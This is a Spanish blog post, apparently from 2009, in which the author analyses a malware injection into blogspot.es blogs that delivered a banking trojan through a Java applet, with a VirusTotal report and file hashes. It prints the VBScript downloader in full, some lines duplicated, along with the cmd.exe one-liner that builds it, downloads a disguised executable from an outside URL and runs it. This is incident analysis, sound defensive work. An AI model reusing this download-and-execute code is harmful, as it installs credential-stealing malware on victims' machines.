¡Comprometidos los blogs de blogspot.es!

Ahora que los chicos de blogspot.es han solucionado el problema (durante la tarde del Lunes 19 de Octubre), puedo comentar esta noticia.


El pasado viernes 16 de octubre por la mañana, me encontré con una sorpresa al acceder a este mismo blog que estáis leyendo, a nuestro queridísimo blog http://unlugarsinfin.blogspot.es.


De repente, un mensaje me solicitaba confiar en la ejecución de un applet firmado por www.eternalcog.org.


Evidentemente, no se trataba de ninguna funcionalidad nueva de nuestro servidor de hosting gratuito, pues el firmante se trataba, nada más y nada menos, de la Eterna Iglesia de Dios (toma ya, con la Iglesia hemos topado).


Viendo el código fuente de la página, en seguida te percatabas de lo ocurrido...


En el apartado ‘Acerca de’ presente en la columna de la izquierda de nuestro blog, presente en todas las plantillas de blogspot.es y por tanto presente en todos los blogs de blogspot.es, nos encontramos con el siguiente código:


Un lugar sin fin


¡Se trataba pues de una infección mediante Java Applet (y VBScript) que afectaba a todos los blogs de blogspot.es!.


Para corroborarlo (bueno sí, y por curiosidad), decidí ahondar más en la infección.


Normalmente, en este tipo de infecciones, mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con un click. Basta decir que se confía en el applet que se intenta ejecutar.


Pues bien, en un entorno mega-virtual (sandbox) para pruebas y demás (tengo que quedar bien, claro ;-)) aceptamos confiar en el applet y observamos los resultados.


La primera impresión fue la siguiente:


Efectivamente, el applet creaba un VBScript en la ruta de instalación de mi Firefox con el siguiente contenido:


Const adTypeBinary = 1

Const adSaveCreateOverWrite = 2

Dim BinaryStream

Dim BinaryStream

Set BinaryStream = CreateObject("ADODB.Stream")

Dim BinaryStream

Dim BinaryStream

BinaryStream.Type = adTypeBinary

Set BinaryStream = CreateObject("ADODB.Stream")

BinaryStream.Open

BinaryStream.Open

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))

BinaryStream.Open

BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite

Function BinaryGetURL(URL)

Dim Http

Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")

Http.Open "GET", URL, False

Http.Send

BinaryGetURL = Http.ResponseBody

End Function

Set shell = CreateObject("WScript.Shell")

shell.Run "xxx.exe"


y, a través del mismo, intentaba descargar y ejecutar el siguiente fichero http://www.discounttart.co.uk/newsletter/adobe.jpg renombrado a ‘xxx.exe’.


Veámoslo más en detalle a través de los comandos y procesos que lanzaba el applet:




Y a continuación, vemos las propiedades de uno de ellos:


Lo tenemos. El comando que ejecutaba el applet es el siguiente:


cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> poq.vbs & echo Http.Open "GET", URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject("WScript.Shell") >> poq.vbs & echo shell.Run "xxx.exe" >> poq.vbs & start poq.vbs http://www.discounttart.co.uk/newsletter/adobe.jpg xxx.exe


A estas alturas, ya sabemos de que se trataba la infección: llamaba y ejecutaba un applet desde una web externa (al parecer también comprometida) y se descargaba y ejecutaba un fichero de otra:



Pero ¿qué hace ese fichero adobe.jpg? ¿Qué tipo de malware conlleva?


Subimos el fichero adobe.jpg a Virustotal y salimos de dudas: se trata de un troyano que intenta robar información relacionada con las transacciones comerciales y bancarias del usuario infectado, el Trojan-Spy.Win32.Banker, que además y como podemos ver abajo, tiene un bajo índice de detecciones por la mayoría de motores de antivirus.


En resumen, hemos sido principales testigos de una infección que ha podido afectar y comprometer a miles de usuarios. Por mi parte, intenté avisar a los administradores de blogspot.es y, si bien han solucionado el problema, todavía no he recibido contestación alguna (ni creo que la reciba, con todo el lío que han tenido que

tener).


Daré más datos siempre que reciba más información y la seguridad y ética me lo permitan ;-)


Análisis del archivo adobe.jpg recibido el 2009.10.19 15:08:42 (UTC)

Resultado: 7/40 (17.5%)

Motor antivirus

Versión

Última actualización

Resultado

a-squared

4.5.0.41

2009.10.19

Trojan-Spy.Win32.Banker.ARQ!IK

AhnLab-V3

5.0.0.2

2009.10.19

-

AntiVir

7.9.1.35

2009.10.19

-

Antiy-AVL

2.0.3.7

2009.10.19

-

Authentium

5.1.2.4

2009.10.19

-

Avast

4.8.1351.0

2009.10.18

-

AVG

8.5.0.420

2009.10.19

-

BitDefender

7.2

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

CAT-QuickHeal

10.00

2009.10.18

-

ClamAV

0.94.1

2009.10.19

-

Comodo

2657

2009.10.19

-

DrWeb

5.0.0.12182

2009.10.19

-

eSafe

7.0.17.0

2009.10.19

-

eTrust-Vet

35.1.7074

2009.10.19

-

F-Prot

4.5.1.85

2009.10.18

-

F-Secure

9.0.15300.0

2009.10.16

Gen:Trojan.Heur.jm0@sTnLSqnib

Fortinet

3.120.0.0

2009.10.19

-

GData

19

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

Ikarus

T3.1.1.72.0

2009.10.19

Trojan-Spy.Win32.Banker.ARQ

Jiangmin

11.0.800

2009.10.19

-

K7AntiVirus

7.10.874

2009.10.19

-

Kaspersky

7.0.0.125

2009.10.19

-

McAfee

5775

2009.10.18

-

McAfee+Artemis

5775

2009.10.18

-

McAfee-GW-Edition

6.8.5

2009.10.19

-

Microsoft

1.5101

2009.10.19

-

NOD32

4522

2009.10.19

-

Norman

6.03.02

2009.10.19

W32/Obfuscated.H2!genr

nProtect

2009.1.8.0

2009.10.19

-

Panda

10.0.2.2

2009.10.18

Suspicious file

Prevx

3.0

2009.10.19

-

Rising

21.52.04.00

2009.10.19

-

Sophos

4.46.0

2009.10.19

-

Sunbelt

3.2.1858.2

2009.10.18

-

Symantec

1.4.4.12

2009.10.19

-

TheHacker

6.5.0.2.047

2009.10.19

-

TrendMicro

8.950.0.1094

2009.10.19

-

VBA32

3.12.10.11

2009.10.18

-

ViRobot

2009.10.19.1993

2009.10.19

-

VirusBuster

4.6.5.0

2009.10.19

-

Información adicional

Tamano archivo: 147456 bytes

MD5...: 3afcb4180f095a4e173c31eae957865e

SHA1..: 501e9c3961f290f35ce67128c2b4e6b6486d3286

SHA256: 50da17057b780bc7b78a5d8588c55412b7ea4323bd5a0b264fb6e5552315ef16

ssdeep: 3072:tjNuE+Yj+LqwWh3aOxyrwG9XhVRG1uWB8xOU75xKsAd:tXOWh3aOxysG9Xh
VRG1uWB8xOU75xK

PEiD..: -

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x2698
timedatestamp.....: 0x4ada75b2 (Sun Oct 18 01:56:02 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x1e824 0x1f000 5.71 987cd15991770991e1f15e7e73f63c3c
.data 0x20000 0x16e8 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110
.rsrc 0x22000 0x2b5a 0x3000 4.18 2871f25d7b9eff57b91e38761a302c49

( 1 imports )
> MSVBVM60.DLL: __vbaVarTstGt, __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaPut3, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, -, __vbaFreeObjList, -, -, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, -, -, __vbaStrCat, -, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, -, __vbaExitProc, -, -, __vbaOnError, -, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, -, __vbaStrFixstr, -, __vbaFpR8, __vbaBoolVarNull, _CIsin, __vbaErase, -, -, -, -, __vbaChkstk, -, __vbaFileClose, EVENT_SINK_AddRef, -, __vbaGenerateBoundsError, -, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaRedimPreserve, _adj_fpatan, __vbaFixstrConstruct, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, -, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, -, -, __vbaStrToUnicode, __vbaPrintFile, _adj_fprem, _adj_fdivr_m64, -, -, -, __vbaFPException, __vbaInStrVar, -, __vbaUbound, __vbaStrVarVal, __vbaVarCat, __vbaI2Var, -, -, _CIlog, __vbaErrorOverflow, -, __vbaFileOpen, -, -, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, -, _adj_fdivr_m32i, -, __vbaStrCopy, -, __vbaFreeStrList, -, _adj_fdivr_m32, _adj_fdiv_r, -, __vbaVarTstNe, __vbaI4Var, __vbaVarCmpEq, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, -, __vbaVarCopy, -, _CIatan, -, __vbaCastObj, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, __vbaAryUnlock, __vbaUI1Var, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr, -

( 0 exports )

RDS...: NSRL Reference Data Set
-

pdfid.: -

trid..: Win32 Executable Microsoft Visual Basic 6 (86.2%)
Win32 Executable Generic (5.8%)
Win32 Dynamic Link Library (generic) (5.1%)
Generic Win/DOS Executable (1.3%)
DOS Executable Generic (1.3%)

sigcheck:
publisher....: sony
copyright....: n/a
product......: terra
description..: n/a
original name: jh.exe
internal name: jh
file version.: 2.00
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned


Extraído de http://unlugarsinfin.blogspot.es

Comentarios